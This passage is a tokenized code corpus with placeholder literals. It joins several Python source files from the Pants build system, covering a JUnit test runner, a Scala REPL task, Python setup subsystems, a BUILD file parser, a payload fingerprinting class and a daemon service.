preferred_jvm_distribution_for_targets ( targets ) <EOL> actual_executor = executor or SubprocessExecutor ( distribution ) <EOL> return distribution . execute_java ( * args , executor = actual_executor , ** kwargs ) <EOL> def _collect_test_targets ( self , targets ) : <EOL> """<STR_LIT>""" <EOL> tests_from_targets = dict ( list ( self . _calculate_tests_from_targets ( targets ) ) ) <EOL> if targets and self . _tests_to_run : <EOL> tests_with_targets = { } <EOL> unknown_tests = [ ] <EOL> for test in self . _get_tests_to_run ( ) : <EOL> test_class_name = test . partition ( '<STR_LIT:#>' ) [ <NUM_LIT:0> ] <EOL> target = tests_from_targets . get ( test_class_name ) <EOL> if target is None : <EOL> unknown_tests . append ( test ) <EOL> else : <EOL> tests_with_targets [ test ] = target <EOL> if len ( unknown_tests ) > <NUM_LIT:0> : <EOL> raise TaskError ( "<STR_LIT>" "<STR_LIT>" <EOL> . format ( "<STR_LIT>" . join ( unknown_tests ) ) ) <EOL> return tests_with_targets <EOL> else : <EOL> return tests_from_targets <EOL> def _get_failed_targets ( self , tests_and_targets ) : <EOL> """<STR_LIT>""" <EOL> def get_test_filename ( test_class_name ) : <EOL> return os . path . join ( self . workdir , '<STR_LIT>' . format ( test_class_name . replace ( '<STR_LIT:$>' , '<STR_LIT:->' ) ) ) <EOL> xml_filenames_to_targets = defaultdict ( ) <EOL> for test , target in tests_and_targets . items ( ) : <EOL> if target is None : <EOL> self . context . log . warn ( '<STR_LIT>' . format ( test ) ) <EOL> test_class_name = test <EOL> for _part in test . split ( '<STR_LIT:$>' ) : <EOL> filename = get_test_filename ( test_class_name ) <EOL> if os . path . exists ( filename ) : <EOL> xml_filenames_to_targets [ filename ] = target <EOL> break <EOL> else : <EOL> test_class_name = test_class_name . rsplit ( '<STR_LIT:$>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> failed_targets = defaultdict ( set ) <EOL> for xml_filename , target in xml_filenames_to_targets . items ( ) : <EOL> try : <EOL> xml = XmlParser . from_file ( xml_filename ) <EOL> failures = int ( xml . get_attribute ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> errors = int ( xml . get_attribute ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if target and ( failures or errors ) : <EOL> for testcase in xml . parsed . getElementsByTagName ( '<STR_LIT>' ) : <EOL> test_failed = testcase . getElementsByTagName ( '<STR_LIT>' ) <EOL> test_errored = testcase . getElementsByTagName ( '<STR_LIT:error>' ) <EOL> if test_failed or test_errored : <EOL> failed_targets [ target ] . add ( '<STR_LIT>' . format ( <EOL> testclass = testcase . getAttribute ( '<STR_LIT>' ) , <EOL> testname = testcase . getAttribute ( '<STR_LIT:name>' ) , <EOL> ) ) <EOL> except ( XmlParser . XmlError , ValueError ) as e : <EOL> self . context . log . error ( '<STR_LIT>' . format ( xml_filename , e ) ) <EOL> return dict ( failed_targets ) <EOL> def _run_tests ( self , tests_to_targets ) : <EOL> if self . _coverage : <EOL> extra_jvm_options = self . _coverage . extra_jvm_options <EOL> classpath_prepend = self . _coverage . classpath_prepend <EOL> classpath_append = self . _coverage . classpath_append <EOL> else : <EOL> extra_jvm_options = [ ] <EOL> classpath_prepend = ( ) <EOL> classpath_append = ( ) <EOL> tests_by_properties = self . _tests_by_properties ( <EOL> tests_to_targets , <EOL> self . _infer_workdir , <EOL> lambda target : target . test_platform , <EOL> lambda target : target . payload . extra_jvm_options , <EOL> lambda target : target . payload . extra_env_vars , <EOL> lambda target : target . concurrency , <EOL> lambda target : target . threads <EOL> ) <EOL> classpath_product = self . context . products . get_data ( '<STR_LIT>' ) <EOL> result = <NUM_LIT:0> <EOL> for properties , tests in tests_by_properties . items ( ) : <EOL> ( workdir , platform , target_jvm_options , target_env_vars , concurrency , threads ) = properties <EOL> for batch in self . _partition ( tests ) : <EOL> relevant_targets = set ( map ( tests_to_targets . get , batch ) ) <EOL> complete_classpath = OrderedSet ( ) <EOL> complete_classpath . update ( classpath_prepend ) <EOL> complete_classpath . update ( self . tool_classpath ( '<STR_LIT>' ) ) <EOL> complete_classpath . update ( self . classpath ( relevant_targets , <EOL> classpath_product = classpath_product ) ) <EOL> complete_classpath . update ( classpath_append ) <EOL> distribution = JvmPlatform . preferred_jvm_distribution ( [ platform ] , self . _strict_jvm_version ) <EOL> args = self . _args + [ u'<STR_LIT>' ] <EOL> if concurrency == junit_tests . CONCURRENCY_SERIAL : <EOL> args = remove_arg ( args , '<STR_LIT>' ) <EOL> elif concurrency == junit_tests . CONCURRENCY_PARALLEL_CLASSES : <EOL> args = ensure_arg ( args , '<STR_LIT>' ) <EOL> elif concurrency == junit_tests . CONCURRENCY_PARALLEL_METHODS : <EOL> self . context . log . warn ( '<STR_LIT>' ) <EOL> elif concurrency == junit_tests . CONCURRENCY_PARALLEL_BOTH : <EOL> self . context . log . warn ( '<STR_LIT>' . format ( concurrency ) ) <EOL> args = ensure_arg ( args , '<STR_LIT>' ) <EOL> args = ensure_arg ( args , '<STR_LIT>' ) <EOL> if threads is not None : <EOL> args = remove_arg ( args , '<STR_LIT>' , has_param = True ) <EOL> args += [ '<STR_LIT>' , str ( threads ) ] <EOL> with binary_util . safe_args ( batch , self . get_options ( ) ) as batch_tests : <EOL> self . context . log . debug ( '<STR_LIT>' . format ( workdir ) ) <EOL> self . context . log . debug ( '<STR_LIT>' . format ( platform ) ) <EOL> with environment_as ( ** dict ( target_env_vars ) ) : <EOL> result += abs ( self . _spawn_and_wait ( <EOL> executor = SubprocessExecutor ( distribution ) , <EOL> distribution = distribution , <EOL> classpath = complete_classpath , <EOL> main = JUnitRun . _MAIN , <EOL> jvm_options = self . jvm_options + extra_jvm_options + list ( target_jvm_options ) , <EOL> args = args + batch_tests , <EOL> workunit_factory = self . context . new_workunit , <EOL> workunit_name = '<STR_LIT>' , <EOL> workunit_labels = [ WorkUnitLabel . TEST ] , <EOL> cwd = workdir , <EOL> synthetic_jar_dir = self . workdir , <EOL> create_synthetic_jar = self . synthetic_classpath , <EOL> ) ) <EOL> if result != <NUM_LIT:0> and self . _fail_fast : <EOL> break <EOL> if result != <NUM_LIT:0> : <EOL> failed_targets_and_tests = self . _get_failed_targets ( tests_to_targets ) <EOL> failed_targets = sorted ( failed_targets_and_tests , key = lambda target : target . address . spec ) <EOL> error_message_lines = [ ] <EOL> if self . _failure_summary : <EOL> for target in failed_targets : <EOL> error_message_lines . append ( '<STR_LIT>' . format ( '<STR_LIT:U+0020>' * <NUM_LIT:4> , target . address . spec ) ) <EOL> for test in sorted ( failed_targets_and_tests [ target ] ) : <EOL> error_message_lines . append ( '<STR_LIT>' . format ( '<STR_LIT:U+0020>' * <NUM_LIT:8> , test ) ) <EOL> error_message_lines . append ( <EOL> '<STR_LIT>' <EOL> . format ( main = JUnitRun . _MAIN , code = result , failed = len ( failed_targets ) , <EOL> targets = pluralize ( len ( failed_targets ) , '<STR_LIT:target>' ) ) <EOL> ) <EOL> raise TestFailedTaskError ( '<STR_LIT:\n>' . join ( error_message_lines ) , failed_targets = list ( failed_targets ) ) <EOL> def _infer_workdir ( self , target ) : <EOL> if target . cwd is not None : <EOL> return target . cwd <EOL> return self . _working_dir <EOL> def _tests_by_property ( self , tests_to_targets , get_property ) : <EOL> properties = defaultdict ( OrderedSet ) <EOL> for test , target in tests_to_targets . items ( ) : <EOL> properties [ get_property ( target ) ] . add ( test ) <EOL> return { property : list ( tests ) for property , tests in properties . items ( ) } <EOL> def _tests_by_properties ( self , tests_to_targets , * properties ) : <EOL> def combined_property ( target ) : <EOL> return tuple ( prop ( target ) for prop in properties ) <EOL> return self . _tests_by_property ( tests_to_targets , combined_property ) <EOL> def _partition ( self , tests ) : <EOL> stride = min ( self . _batch_size , len ( tests ) ) <EOL> for i in range ( <NUM_LIT:0> , len ( tests ) , stride ) : <EOL> yield tests [ i : i + stride ] <EOL> def _get_tests_to_run ( self ) : <EOL> for test_spec in self . _tests_to_run : <EOL> src_spec , cls_spec = interpret_test_spec ( test_spec ) <EOL> if src_spec : <EOL> sourcefile , methodname = src_spec <EOL> for classname in self . _classnames_from_source_file ( sourcefile ) : <EOL> yield classname + methodname <EOL> else : <EOL> classname , methodname = cls_spec <EOL> yield classname + methodname <EOL> def _calculate_tests_from_targets ( self , targets ) : <EOL> """<STR_LIT>""" <EOL> classpath_products = self . context . products . get_data ( '<STR_LIT>' ) <EOL> for target in targets : <EOL> contents = ClasspathUtil . classpath_contents ( ( target , ) , classpath_products , confs = self . confs ) <EOL> for f in contents : <EOL> classname = ClasspathUtil . classname_for_rel_classfile ( f ) <EOL> if classname : <EOL> yield ( classname , target ) <EOL> def _classnames_from_source_file ( self , srcfile ) : <EOL> relsrc = os . path . relpath ( srcfile , get_buildroot ( ) ) <EOL> source_products = self . context . products . get_data ( '<STR_LIT>' ) . get ( relsrc ) <EOL> if not source_products : <EOL> self . context . log . warn ( '<STR_LIT>' . format ( srcfile ) ) <EOL> else : <EOL> for _ , classes in source_products . rel_paths ( ) : <EOL> for cls in classes : <EOL> yield _classfile_to_classname ( cls ) <EOL> def _test_target_filter ( self ) : <EOL> def target_filter ( target ) : <EOL> return isinstance ( target , junit_tests ) <EOL> return target_filter <EOL> def _validate_target ( self , target ) : <EOL> if not target . payload . sources . source_paths and not self . get_options ( ) . allow_empty_sources : <EOL> msg = '<STR_LIT>' <EOL> raise TargetDefinitionException ( target , msg ) <EOL> def _execute ( self , targets ) : <EOL> """<STR_LIT>""" <EOL> tests_and_targets = self . _collect_test_targets ( self . _get_test_targets ( ) ) <EOL> if not tests_and_targets : <EOL> return <EOL> def compute_complete_classpath ( ) : <EOL> return self . classpath ( targets ) <EOL> self . context . release_lock ( ) <EOL> if self . _coverage : <EOL> self . _coverage . instrument ( <EOL> targets , tests_and_targets . keys ( ) , compute_complete_classpath , self . execute_java_for_coverage ) <EOL> def _do_report ( exception = None ) : <EOL> if self . _coverage : <EOL> self . _coverage . report ( <EOL> targets , tests_and_targets . keys ( ) , self . execute_java_for_coverage , tests_failed_exception = exception ) <EOL> try : <EOL> self . _run_tests ( tests_and_targets ) <EOL> _do_report ( exception = None ) <EOL> except TaskError as e : <EOL> _do_report ( exception = e ) <EOL> raise </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . backend . jvm . subsystems . scala_platform import ScalaPlatform <EOL> from pants . backend . jvm . targets . jar_dependency import JarDependency <EOL> from pants . backend . jvm . targets . jar_library import JarLibrary <EOL> from pants . backend . jvm . targets . jvm_target import JvmTarget <EOL> from pants . backend . jvm . tasks . jvm_task import JvmTask <EOL> from pants . backend . jvm . tasks . jvm_tool_task_mixin import JvmToolTaskMixin <EOL> from pants . java . distribution . distribution import DistributionLocator <EOL> from pants . task . repl_task_mixin import ReplTaskMixin <EOL> class ScalaRepl ( JvmToolTaskMixin , ReplTaskMixin , JvmTask ) : <EOL> """<STR_LIT>""" <EOL> _RUNNER_MAIN = '<STR_LIT>' <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( ScalaRepl , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> cls . register_jvm_tool ( register , '<STR_LIT>' , classpath = [ <EOL> JarDependency ( org = '<STR_LIT>' , name = '<STR_LIT>' , rev = '<STR_LIT>' ) , <EOL> ] , main = ScalaRepl . _RUNNER_MAIN ) <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return super ( ScalaRepl , cls ) . subsystem_dependencies ( ) + ( DistributionLocator , ScalaPlatform ) <EOL> @ classmethod <EOL> def select_targets ( cls , target ) : <EOL> return isinstance ( target , ( JarLibrary , JvmTarget ) ) <EOL> def setup_repl_session ( self , targets ) : <EOL> repl_name = ScalaPlatform . global_instance ( ) . repl <EOL> return ( self . tool_classpath ( '<STR_LIT>' ) + <EOL> self . tool_classpath ( repl_name , scope = ScalaPlatform . options_scope ) + <EOL> self . classpath ( targets ) ) <EOL> def launch_repl ( self , classpath ) : <EOL> jvm_options = self . jvm_options <EOL> if not any ( opt . startswith ( '<STR_LIT>' ) for opt in jvm_options ) : <EOL> jvm_options . append ( '<STR_LIT>' ) <EOL> DistributionLocator . cached ( ) . execute_java ( classpath = classpath , <EOL> main = ScalaRepl . _RUNNER_MAIN , <EOL> jvm_options = jvm_options , <EOL> args = [ self . get_options ( ) . main ] + self . args , <EOL> create_synthetic_jar = True ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> from pex . fetcher import Fetcher , PyPIFetcher <EOL> from pex . http import Context <EOL> from pkg_resources import Requirement <EOL> from pants . subsystem . subsystem import Subsystem <EOL> class PythonSetup ( Subsystem ) : <EOL> """<STR_LIT>""" <EOL> options_scope = '<STR_LIT>' <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( PythonSetup , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , advanced = True , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , type = list , default = [ '<STR_LIT>' ] , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , default = None , metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , default = None , metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , default = None , metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , type = int , metavar = '<STR_LIT>' , <EOL> default = <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT> , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , default = None , metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ property <EOL> def interpreter_requirement ( self ) : <EOL> return self . get_options ( ) . interpreter_requirement <EOL> @ property <EOL> def setuptools_version ( self ) : <EOL> return self . get_options ( ) . setuptools_version <EOL> @ property <EOL> def wheel_version ( self ) : <EOL> return self . get_options ( ) . wheel_version <EOL> @ property <EOL> def platforms ( self ) : <EOL> return self . get_options ( ) . platforms <EOL> @ property <EOL> def interpreter_cache_dir ( self ) : <EOL> return ( self . get_options ( ) . interpreter_cache_dir or <EOL> os . path . join ( self . scratch_dir , '<STR_LIT>' ) ) <EOL> @ property <EOL> def chroot_cache_dir ( self ) : <EOL> return ( self . get_options ( ) . chroot_cache_dir or <EOL> os . path . join ( self . scratch_dir , '<STR_LIT>' ) ) <EOL> @ property <EOL> def resolver_cache_dir ( self ) : <EOL> return ( self . get_options ( ) . resolver_cache_dir or <EOL> os . path . join ( self . scratch_dir , '<STR_LIT>' ) ) <EOL> @ property <EOL> def resolver_cache_ttl ( self ) : <EOL> return self . get_options ( ) . resolver_cache_ttl <EOL> @ property <EOL> def artifact_cache_dir ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . get_options ( ) . artifact_cache_dir or <EOL> os . path . join ( self . scratch_dir , '<STR_LIT>' ) ) <EOL> @ property <EOL> def scratch_dir ( self ) : <EOL> return os . path . join ( self . get_options ( ) . pants_workdir , * self . options_scope . split ( '<STR_LIT:.>' ) ) <EOL> def setuptools_requirement ( self ) : <EOL> return self . _failsafe_parse ( '<STR_LIT>' . format ( self . setuptools_version ) ) <EOL> def wheel_requirement ( self ) : <EOL> return self . _failsafe_parse ( '<STR_LIT>' . format ( self . wheel_version ) ) <EOL> def _failsafe_parse ( self , requirement ) : <EOL> try : <EOL> return Requirement . parse ( requirement , replacement = False ) <EOL> except TypeError : <EOL> return Requirement . parse ( requirement ) <EOL> class PythonRepos ( Subsystem ) : <EOL> """<STR_LIT>""" <EOL> options_scope = '<STR_LIT>' <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( PythonRepos , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , advanced = True , type = list , default = [ ] , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , type = list , <EOL> default = [ '<STR_LIT>' ] , <EOL> help = '<STR_LIT>' ) <EOL> @ property <EOL> def repos ( self ) : <EOL> return self . get_options ( ) . repos <EOL> @ property <EOL> def indexes ( self ) : <EOL> return self . get_options ( ) . indexes <EOL> def get_fetchers ( self ) : <EOL> fetchers = [ ] <EOL> fetchers . extend ( Fetcher ( [ url ] ) for url in self . repos ) <EOL> fetchers . extend ( PyPIFetcher ( url ) for url in self . indexes ) <EOL> return fetchers <EOL> def get_network_context ( self ) : <EOL> return Context . get ( ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from hashlib import sha1 <EOL> class PayloadFieldAlreadyDefinedError ( Exception ) : pass <EOL> class PayloadFrozenError ( Exception ) : pass <EOL> class Payload ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _fields = { } <EOL> self . _frozen = False <EOL> self . _fingerprint_memo_map = { } <EOL> @ property <EOL> def fields ( self ) : <EOL> return self . _fields . items ( ) <EOL> def freeze ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _frozen = True <EOL> def get_field ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _fields . get ( key , default ) <EOL> def get_field_value ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> if key in self . _fields : <EOL> payload_field = self . _fields [ key ] <EOL> if payload_field : <EOL> return payload_field . value <EOL> return default <EOL> def add_fields ( self , field_dict ) : <EOL> """<STR_LIT>""" <EOL> for key , field in field_dict . items ( ) : <EOL> self . add_field ( key , field ) <EOL> def add_field ( self , key , field ) : <EOL> """<STR_LIT>""" <EOL> if key in self . _fields : <EOL> raise PayloadFieldAlreadyDefinedError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( key = key , existing_field = self . _fields [ key ] , field = field ) ) <EOL> elif self . _frozen : <EOL> raise PayloadFrozenError ( <EOL> '<STR_LIT>' <EOL> . format ( key = key ) ) <EOL> else : <EOL> self . _fields [ key ] = field <EOL> self . _fingerprint_memo = None <EOL> def fingerprint ( self , field_keys = None ) : <EOL> """<STR_LIT>""" <EOL> field_keys = frozenset ( field_keys or self . _fields . keys ( ) ) <EOL> if field_keys not in self . _fingerprint_memo_map : <EOL> self . _fingerprint_memo_map [ field_keys ] = self . _compute_fingerprint ( field_keys ) <EOL> return self . _fingerprint_memo_map [ field_keys ] <EOL> def _compute_fingerprint ( self , field_keys ) : <EOL> hasher = sha1 ( ) <EOL> empty_hash = True <EOL> for key in sorted ( field_keys ) : <EOL> field = self . _fields [ key ] <EOL> if field is not None : <EOL> fp = field . fingerprint ( ) <EOL> if fp is not None : <EOL> empty_hash = False <EOL> hasher . update ( sha1 ( key ) . hexdigest ( ) ) <EOL> hasher . update ( fp ) <EOL> if empty_hash : <EOL> return None <EOL> else : <EOL> return hasher . hexdigest ( ) <EOL> def mark_dirty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _fingerprint_memo_map = { } <EOL> for field in self . _fields . values ( ) : <EOL> field . mark_dirty ( ) <EOL> def __getattr__ ( self , attr ) : <EOL> field = self . _fields [ attr ] <EOL> if field is not None : <EOL> return field . value <EOL> else : <EOL> return None <EOL> def __hasattr__ ( self , attr ) : <EOL> return attr in self . _fields </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import logging <EOL> import warnings <EOL> import six <EOL> logger = logging . getLogger ( __name__ ) <EOL> class BuildFileParser ( object ) : <EOL> """<STR_LIT>""" <EOL> class BuildFileParserError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BuildFileScanError ( BuildFileParserError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AddressableConflictException ( BuildFileParserError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class SiblingConflictException ( BuildFileParserError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ParseError ( BuildFileParserError ) : <EOL> """<STR_LIT>""" <EOL> class ExecuteError ( BuildFileParserError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , build_configuration , root_dir ) : <EOL> self . _build_configuration = build_configuration <EOL> self . _root_dir = root_dir <EOL> @ property <EOL> def root_dir ( self ) : <EOL> return self . _root_dir <EOL> def registered_aliases ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _build_configuration . registered_aliases ( ) <EOL> def address_map_from_build_files ( self , build_files ) : <EOL> family_address_map_by_build_file = self . parse_build_files ( build_files ) <EOL> address_map = { } <EOL> for build_file , sibling_address_map in family_address_map_by_build_file . items ( ) : <EOL> address_map . update ( sibling_address_map ) <EOL> return address_map <EOL> def parse_build_files ( self , build_files ) : <EOL> family_address_map_by_build_file = { } <EOL> for bf in build_files : <EOL> bf_address_map = self . parse_build_file ( bf ) <EOL> for address , addressable in bf_address_map . items ( ) : <EOL> for sibling_build_file , sibling_address_map in family_address_map_by_build_file . items ( ) : <EOL> if address in sibling_address_map : <EOL> raise self . SiblingConflictException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( conflicting_file = sibling_build_file , <EOL> addressable_file = address . build_file , <EOL> target_name = address . target_name ) ) <EOL> family_address_map_by_build_file [ bf ] = bf_address_map <EOL> return family_address_map_by_build_file <EOL> def parse_build_file ( self , build_file ) : <EOL> """<STR_LIT>""" <EOL> def _format_context_msg ( lineno , offset , error_type , message ) : <EOL> """<STR_LIT>""" <EOL> build_contents = build_file . source ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> context = "<STR_LIT>" . format ( build_file = build_file ) <EOL> curr_lineno = <NUM_LIT:0> <EOL> for line in build_contents . split ( '<STR_LIT:\n>' ) : <EOL> line = line . encode ( '<STR_LIT:ascii>' , '<STR_LIT>' ) <EOL> curr_lineno += <NUM_LIT:1> <EOL> if curr_lineno == lineno : <EOL> highlight = '<STR_LIT:*>' <EOL> else : <EOL> highlight = '<STR_LIT:U+0020>' <EOL> if curr_lineno >= lineno - <NUM_LIT:3> : <EOL> context += "<STR_LIT>" . format ( <EOL> highlight = highlight , line = line , curr_lineno = curr_lineno ) <EOL> if lineno == curr_lineno : <EOL> if offset : <EOL> context += ( "<STR_LIT>" <EOL> . format ( caret = "<STR_LIT>" , width = int ( offset ) , error_type = error_type , <EOL> message = message ) ) <EOL> else : <EOL> context += ( "<STR_LIT>" <EOL> . format ( error_type = error_type , message = message ) ) <EOL> if curr_lineno > lineno + <NUM_LIT:3> : <EOL> break <EOL> return context <EOL> logger . debug ( "<STR_LIT>" <EOL> . format ( build_file = build_file ) ) <EOL> try : <EOL> build_file_code = build_file . code ( ) <EOL> except SyntaxError as e : <EOL> raise self . ParseError ( _format_context_msg ( e . lineno , e . offset , e . __class__ . __name__ , e ) ) <EOL> except Exception as e : <EOL> raise self . ParseError ( "<STR_LIT>" <EOL> . format ( error_type = e . __class__ . __name__ , <EOL> message = e , build_file = build_file ) ) <EOL> parse_state = self . _build_configuration . initialize_parse_state ( build_file ) <EOL> try : <EOL> with warnings . catch_warnings ( record = True ) as warns : <EOL> six . exec_ ( build_file_code , parse_state . parse_globals ) <EOL> for warn in warns : <EOL> logger . warning ( _format_context_msg ( lineno = warn . lineno , <EOL> offset = None , <EOL> error_type = warn . category . __name__ , <EOL> message = warn . message ) ) <EOL> except Exception as e : <EOL> raise self . ExecuteError ( "<STR_LIT>" <EOL> . format ( message = e , build_file = build_file ) ) <EOL> address_map = { } <EOL> for address , addressable in parse_state . registered_addressable_instances : <EOL> logger . debug ( '<STR_LIT>' <EOL> . format ( addressable = addressable , <EOL> address = address ) ) <EOL> if address in address_map : <EOL> raise self . AddressableConflictException ( <EOL> "<STR_LIT>" <EOL> . format ( conflicting_file = address . build_file , <EOL> target_name = address . target_name ) ) <EOL> address_map [ address ] = addressable <EOL> logger . debug ( "<STR_LIT>" <EOL> . format ( build_file = build_file ) ) <EOL> for address , addressable in address_map . items ( ) : <EOL> logger . debug ( "<STR_LIT>" <EOL> . format ( address = address , <EOL> addressable = addressable ) ) <EOL> return address_map </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . base . exceptions import TaskError <EOL> from pants . pantsd . process_manager import ProcessManager <EOL> from pants . pantsd . subsystem . pants_daemon_launcher import PantsDaemonLauncher <EOL> from pants . task . task import Task <EOL> class PantsDaemonKill ( Task ) : <EOL> """<STR_LIT>""" <EOL> def execute ( self ) : <EOL> try : <EOL> PantsDaemonLauncher . global_instance ( ) . terminate ( ) <EOL> except ProcessManager . NonResponsiveProcess as e : <EOL> raise TaskError ( '<STR_LIT>' . format ( e ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from abc import abstractproperty <EOL> from pants . util . meta import AbstractClass <EOL> from pants . util . objects import datatype <EOL> class Selector ( AbstractClass ) : <EOL> @ abstractproperty <EOL> def optional ( self ) : <EOL> """<STR_LIT>""" <EOL> class Select ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , product , optional = False ) : <EOL> return super ( Select , cls ) . __new__ ( cls , product , optional ) <EOL> class SelectVariant ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> optional = False <EOL> class SelectDependencies ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , product , deps_product , field = None ) : <EOL> return super ( SelectDependencies , cls ) . __new__ ( cls , product , deps_product , field ) <EOL> optional = False <EOL> class SelectProjection ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> optional = False <EOL> class SelectLiteral ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> optional = False </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from contextlib import closing <EOL> from six import StringIO <EOL> class Manifest ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _wrap ( text ) : <EOL> text = text . encode ( '<STR_LIT:ascii>' ) <EOL> with closing ( StringIO ( text ) ) as fp : <EOL> yield fp . read ( <NUM_LIT> ) <EOL> while True : <EOL> chunk = fp . read ( <NUM_LIT> ) <EOL> if not chunk : <EOL> return <EOL> yield '<STR_LIT>' . format ( chunk ) <EOL> PATH = '<STR_LIT>' <EOL> MANIFEST_VERSION = '<STR_LIT>' <EOL> CREATED_BY = '<STR_LIT>' <EOL> MAIN_CLASS = '<STR_LIT>' <EOL> CLASS_PATH = '<STR_LIT>' <EOL> def __init__ ( self , contents = '<STR_LIT>' ) : <EOL> self . _contents = contents . strip ( ) . encode ( '<STR_LIT:ascii>' ) <EOL> def addentry ( self , header , value ) : <EOL> if len ( header ) > <NUM_LIT> : <EOL> raise ValueError ( '<STR_LIT>' . format ( header ) ) <EOL> if self . _contents : <EOL> self . _contents += '<STR_LIT:\n>' <EOL> self . _contents += '<STR_LIT:\n>' . join ( self . _wrap ( '<STR_LIT>' . format ( header = header , value = value ) ) ) <EOL> def contents ( self ) : <EOL> padded = self . _contents + '<STR_LIT:\n>' <EOL> return padded . encode ( '<STR_LIT:ascii>' ) <EOL> def is_empty ( self ) : <EOL> if self . _contents . strip ( ) : <EOL> return False <EOL> return True </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import logging <EOL> import select <EOL> from pants . pantsd . pailgun_server import PailgunServer <EOL> from pants . pantsd . service . pants_service import PantsService <EOL> class PailgunService ( PantsService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , bind_addr , exiter_class , runner_class ) : <EOL> """<STR_LIT>""" <EOL> super ( PailgunService , self ) . __init__ ( ) <EOL> self . _logger = logging . getLogger ( __name__ ) <EOL> self . _bind_addr = bind_addr <EOL> self . _exiter_class = exiter_class <EOL> self . _runner_class = runner_class <EOL> self . _pailgun = None <EOL> @ property <EOL> def pailgun ( self ) : <EOL> if not self . _pailgun : <EOL> self . _pailgun = self . _setup_pailgun ( ) <EOL> return self . _pailgun <EOL> @ property <EOL> def pailgun_port ( self ) : <EOL> return self . pailgun . server_port <EOL> def _setup_pailgun ( self ) : <EOL> """<STR_LIT>""" <EOL> def runner_factory ( sock , arguments , environment ) : <EOL> exiter = self . _exiter_class ( sock ) <EOL> return self . _runner_class ( sock , exiter , arguments , environment ) <EOL> return PailgunServer ( self . _bind_addr , runner_factory ) <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _logger . info ( '<STR_LIT>' . format ( self . pailgun_port ) ) <EOL> try : <EOL> while not self . is_killed : <EOL> self . pailgun . handle_request ( ) <EOL> except select . error : <EOL> self . _logger . warning ( '<STR_LIT>' ) <EOL> def 